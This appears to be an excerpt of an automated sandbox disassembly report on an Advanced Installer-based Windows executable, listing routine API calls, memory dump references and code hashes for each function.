                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?), ref: 001F5B21
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 001F5B27
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?), ref: 001F5BB3
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?), ref: 001F5BB9
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                          • String ID: Lt=
                                                                                                                                                                                                                                                                          • API String ID: 3859560861-2516213077
                                                                                                                                                                                                                                                                          • Opcode ID: 38115bc9596c76c5a722498d527533421c17730a3df90b69eb4ce3e40869835a
                                                                                                                                                                                                                                                                          • Instruction ID: 7849e049cfc42a196880795b749d523c62bdf074fd44c87cb09e6b1188b9afdf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38115bc9596c76c5a722498d527533421c17730a3df90b69eb4ce3e40869835a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F291E070D0064CDFDB15DFA4C945BEEBBB6FF54314F20425AE611AB291DB74AA04CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?), ref: 001F4881
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 001F4887
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(?,?,?,?), ref: 001F4913
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 001F4919
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                                                                          • String ID: Lt=
                                                                                                                                                                                                                                                                          • API String ID: 3859560861-2516213077
                                                                                                                                                                                                                                                                          • Opcode ID: 6047bc72506e14c3d245016f5437bd5953c566a51d37b8cec01cd642acab1aaf
                                                                                                                                                                                                                                                                          • Instruction ID: a564d8ee0166460b091d0f911457cbcd91cbcfbd1a5969d08552a51661f16e12
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6047bc72506e14c3d245016f5437bd5953c566a51d37b8cec01cd642acab1aaf
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF61DC70E0028CEFDF15DBA4D844BEFBBB5BF55314F10426AE502AB291DB74AA05CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55F0A4
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55F0C6
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A55F0EE
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6A55F1D7
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A55F201
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 459529453-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2bd933bb64f1d8824d23e2c843d2347adfda99c8f158e7e368e964735ef42d4d
                                                                                                                                                                                                                                                                          • Instruction ID: adf881349570f76e7f33041d8abe2252f11351c205ebcdc0185237af3e26af1a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2bd933bb64f1d8824d23e2c843d2347adfda99c8f158e7e368e964735ef42d4d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB519C70D00258EFDB11CF98C884B9EBBF4EF01318F26455AE845AB391DB75AE05CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55FA1D
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6A55FA40
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A55FA68
                                                                                                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6A55FADD
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6A55FB07
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2490673887.000000006A521000.00000020.00000001.01000000.0000001E.sdmp, Offset: 6A520000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490646532.000000006A520000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490766295.000000006A5CC000.00000004.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2490815908.000000006A5D8000.00000002.00000001.01000000.0000001E.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_6a520000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 459529453-0
                                                                                                                                                                                                                                                                          • Opcode ID: 58ba56c0fe9c2cb389e7c216c1ed88ff5750e33a604f374d8edaeb9f5a1ec5f8
                                                                                                                                                                                                                                                                          • Instruction ID: fea7b55e18c6afb5669fd9944fc1ed266e4a814812282017c28772c7c3fbbfa8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58ba56c0fe9c2cb389e7c216c1ed88ff5750e33a604f374d8edaeb9f5a1ec5f8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5641B271800255EFDB12DF58C44479EBBB8EF05314F16425BE814A7382DB30AE45CBD2
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 001BE79A
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001BE7A0
                                                                                                                                                                                                                                                                          • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,00000000,00000000,00000000), ref: 001BE7C3
                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00372D76,000000FF), ref: 001BE7EB
                                                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,00372D76,000000FF), ref: 001BE7F1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$FreeProcess$FormatMessage
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1606019998-0
                                                                                                                                                                                                                                                                          • Opcode ID: eeb155492ba3870deb5f28d0dbdd369e905de46340e48d3008492fa06c1b7c32
                                                                                                                                                                                                                                                                          • Instruction ID: d96b7b76207806f4970112834e0a8f3995af57c5ac661b67b7e16a5d9b42a471
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eeb155492ba3870deb5f28d0dbdd369e905de46340e48d3008492fa06c1b7c32
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65114CB0E04719ABEB11DF94CC46BAFBBE8AB04B04F104519F910AB2C1D7B9A90487D0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateEventExW.KERNEL32(00000000,00000000,00000001,001F0003,?,00000000,00000000,00000000,?,?), ref: 001BB08B
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001BB0CB
                                                                                                                                                                                                                                                                            • Part of subcall function 001BB6E0: GetProcessHeap.KERNEL32(?,00000000,003D744C,003D744A,?,?,?,?,DF534560,?), ref: 001BB7D6
                                                                                                                                                                                                                                                                            • Part of subcall function 001BB6E0: HeapFree.KERNEL32(00000000,?,00000000,003D744C,003D744A,?,?,?,?,DF534560,?), ref: 001BB7DC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Heap$CreateEventFreeObjectProcessSingleWait
                                                                                                                                                                                                                                                                          • String ID: :$t=
                                                                                                                                                                                                                                                                          • API String ID: 2599534607-1013641504
                                                                                                                                                                                                                                                                          • Opcode ID: 09472012ab7a34d8446e62ad5c77b3741c736105c9ce854357c9d61aa6f4e47d
                                                                                                                                                                                                                                                                          • Instruction ID: efe8da778c3395a8a4907447036d75863102b5ca9a1272652187a8c29703f570
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 09472012ab7a34d8446e62ad5c77b3741c736105c9ce854357c9d61aa6f4e47d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93E15C70C0528CEEEB01DFA8D9997EDBFB4AF21308F248199D0516B2D2D7B51B48DB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: GetProcessHeap.KERNEL32 ref: 001B9E75
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9EA7
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9E20: __Init_thread_footer.LIBCMT ref: 001B9F32
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,003B25BF,000000FF), ref: 002E4773
                                                                                                                                                                                                                                                                          • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,003B25BF,000000FF), ref: 002E4801
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Init_thread_footer$CloseCriticalDeleteHandleHeapProcessSection
                                                                                                                                                                                                                                                                          • String ID: << Advanced Installer (x86) Log >>$t=
                                                                                                                                                                                                                                                                          • API String ID: 3699736680-71087651
                                                                                                                                                                                                                                                                          • Opcode ID: e88950dbc1c18a8739e0eec4cee7b5d1b25def73ae394d9324a8a731feb694df
                                                                                                                                                                                                                                                                          • Instruction ID: 880e4952cbb7ad8388059d9b0e42a26c20560ac10c577b725a12e97cf630e667
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e88950dbc1c18a8739e0eec4cee7b5d1b25def73ae394d9324a8a731feb694df
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A961DE70901686DFDB01CF69D948B9EFBF4EF46315F1082A9E4049B792DB74AA04CBE0
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,DF534560,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 002F4484
                                                                                                                                                                                                                                                                            • Part of subcall function 002B5460: MultiByteToWideChar.KERNEL32(00000003,00000000,7508EB20,000000FF,00000000,00000000,?,?,759234C0,80004005,?,?,?,003AE8AD,000000FF,?), ref: 002B5478
                                                                                                                                                                                                                                                                            • Part of subcall function 002B5460: MultiByteToWideChar.KERNEL32(00000003,00000000,7508EB20,000000FF,?,-00000001,?,?,759234C0,80004005,?,?,?,003AE8AD,000000FF,?), ref: 002B54AA
                                                                                                                                                                                                                                                                            • Part of subcall function 001C7340: RaiseException.KERNEL32(DF534560,DF534560,00000000,00000000,002F56DB,C000008C,00000001,DF534560), ref: 001C734C
                                                                                                                                                                                                                                                                            • Part of subcall function 001B9AE0: RtlAllocateHeap.NTDLL(?,00000000,?,DF534560,00000000,00371390,000000FF,?,?,0044E7AC,?,001BCB99,80004005,DF534560,-00000010,?), ref: 001B9B2A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$AllocateExceptionHeapObjectRaiseSingleWait
                                                                                                                                                                                                                                                                          • String ID: *.*$.jar$.pack
                                                                                                                                                                                                                                                                          • API String ID: 2917691982-3892993289
                                                                                                                                                                                                                                                                          • Opcode ID: 773f1afde3a912003124896970887539440fd65ca8e451dc315e1e145651df69
                                                                                                                                                                                                                                                                          • Instruction ID: 86c0e1ab694916b7bf2ab5a1425b22a8275b9a6f2623a0ef5f7c8772f060c3a1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 773f1afde3a912003124896970887539440fd65ca8e451dc315e1e145651df69
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94518E70A0061A9FDB10EFA9C844BAFF7B8FF45354F104269E525EB291DB74D914CB90
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,Caphyon.AI.ExtUI.IEClickSoundRemover,DF534560), ref: 001CB821
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 001CB84A
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • AppEvents\Schemes\Apps\Explorer\Navigating\.Current, xrefs: 001CB88A
                                                                                                                                                                                                                                                                          • Caphyon.AI.ExtUI.IEClickSoundRemover, xrefs: 001CB816
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CreateErrorEventLast
                                                                                                                                                                                                                                                                          • String ID: AppEvents\Schemes\Apps\Explorer\Navigating\.Current$Caphyon.AI.ExtUI.IEClickSoundRemover
                                                                                                                                                                                                                                                                          • API String ID: 545576003-2079760225
                                                                                                                                                                                                                                                                          • Opcode ID: 58d8cd859379315354681c11fa2ee876be9aadfef9784e22e2c2367d9e4180e7
                                                                                                                                                                                                                                                                          • Instruction ID: 161797a6d24b8f8e68a11dc965e151fe109571f5b424a18914f8357d9b8fb470
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58d8cd859379315354681c11fa2ee876be9aadfef9784e22e2c2367d9e4180e7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A4617B70D05349EEDB11CF68C955BDEFBF4AF24704F10829DE459A7281DBB4AA08CBA1
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,DF534560,00000001,7508EB20,00000000), ref: 002B85CF
                                                                                                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,000003FF,?,00000000,?,80000000,00000003,00000000,00000003,00000080,00000000,DF534560,00000001,7508EB20,00000000), ref: 002B8605
                                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,80000000,00000003,00000000,00000003,00000080,00000000,DF534560,00000001,7508EB20,00000000), ref: 002B86CC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$CloseCreateHandleRead
                                                                                                                                                                                                                                                                          • String ID: t=
                                                                                                                                                                                                                                                                          • API String ID: 1035965006-4144653439
                                                                                                                                                                                                                                                                          • Opcode ID: b7180198aba6132d7abdf6d3bb2dad51a3398421d4c22c9f8377967377b861e3
                                                                                                                                                                                                                                                                          • Instruction ID: 4c544997689f81f046c86c1f8f5a5bc9180dfa4043bb3de1c195f4a9de87ee0a
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7180198aba6132d7abdf6d3bb2dad51a3398421d4c22c9f8377967377b861e3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F41AD71A00205DFDB21DF68C885BAEB7BCFF45324F148259E619EB2D1DB74A900CB54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 002B9490: LoadLibraryW.KERNEL32(ComCtl32.dll,DF534560,00000000,?,00000000), ref: 002B94CE
                                                                                                                                                                                                                                                                            • Part of subcall function 002B9490: GetProcAddress.KERNEL32(00000000,LoadIconMetric), ref: 002B94F1
                                                                                                                                                                                                                                                                            • Part of subcall function 002B9490: FreeLibrary.KERNEL32(00000000), ref: 002B956F
                                                                                                                                                                                                                                                                          • MulDiv.KERNEL32(00000009,00000000), ref: 002C0BBA
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000014.00000002.2487719493.00000000001B1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 001B0000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487690324.00000000001B0000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487913830.00000000003CC000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2487992773.0000000000453000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488012045.0000000000458000.00000008.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488035341.0000000000459000.00000004.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000014.00000002.2488056393.000000000045C000.00000002.00000001.01000000.0000001A.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_20_2_1b0000_a1.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                                                                                                          • String ID: Courier New$h]4$a4
                                                                                                                                                                                                                                                                          • API String ID: 145871493-3583010180
                                                                                                                                                                                                                                                                          • Opcode ID: 180fca24ba728ce6a0bcddca8d1c4a04078a57ba949d219ff14457bb1e964b95
